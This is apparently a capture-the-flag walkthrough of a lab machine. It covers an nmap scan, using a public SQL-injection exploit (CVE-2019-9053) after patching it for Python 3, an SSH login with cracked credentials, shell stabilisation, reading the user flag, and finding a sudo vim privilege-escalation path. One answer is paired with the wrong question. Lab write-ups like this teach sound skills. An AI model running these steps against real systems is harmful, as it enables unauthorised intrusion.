$ nmap -sC -sV 10.10.48.90
Starting Nmap 7.92 ( https://nmap.org ) at 2023-12-07 22:29 IST
Nmap scan report for 10.10.48.90
Host is up (0.14s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.17.48.138
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
| 256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_ 256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.85 seconds
There are three open ports:
Port
Service
21
ftp
80
http
2222
ssh
Out of the three, only two are below 1000.
Answer
2
What is running on the higher port?
The highest port is 2222 which has SSH running on it.
Answer
ssh
What's the CVE you're using against the application?
On the web page, in the footer section we can find the version of the CMS.
Let's check Exploit-DB to see if there is an exploit for that version.
Answer
CVE-2019-9053
To what kind of vulnerability is the application vulnerable?
The vulnerability is mentions in the CVE page.
Answer
SQLi
What's the password?
Let's save the exploit to a file called exploit.py.
If you don't have termcolor, you can use the following command:
pip install termcolor
We will have to modify the exploit a bit for Python3.
exploit.py
if not options.url:
-- print "[+] Specify an url target"
++ print("[+] Specify an url target")
-- print "[+] Example usage (no cracking password): exploit.py -u http://target-uri"
++ print("[+] Example usage (no cracking password): exploit.py -u http://target-uri")
-- print "[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist"
++ print("[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist")
-- print "[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based."
++ print("[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.")
def crack_password():
-- dict = open(wordlist)
++ dict = open(wordlist, encoding='utf-8', errors='ignore')
def beautify_print_try(value):
-- print "\033c"
++ print("\033c")
def beautify_print():
-- print "\033c"
++ print("\033c")
if options.cracking:
-- print colored "[*] Now try to crack password"
++ print colored("[*] Now try to crack password")
Let's try and login through SSH using the mitch username and secret password.
$ ssh mitch@10.10.48.90 -p 2222
The authenticity of host '[10.10.48.90]:2222 ([10.10.48.90]:2222)' can't be established.
ED25519 key fingerprint is SHA256:iq4f0XcnA5nnPNAufEqOpvTbO8dOJPcHGgmeABEdQ5g.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.48.90]:2222' (ED25519) to the list of known hosts.
mitch@10.10.48.90's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$
Note that we had to specify port 2222 because that is the port SSH was running on in this machine.
Answer
ssh
What's the user flag?
We can stabilize the shell using the following commands:
python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL + Z
stty raw -echo; fg
export TERM=xterm
Let's read the user flag.
mitch@Machine:~$ cat user.txt
G00d j0b, keep up!
Answer
G00d j0b, keep up!
Is there any other user in the home directory? What's its name?
Let's check for other users.
mitch@Machine:~$ ls /home/
mitch sunbath
Answer
sunbath
What can you leverage to spawn a privileged shell?
We can check the files that mitch can execute using the following command:
mitch@Machine:~$ sudo -l
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim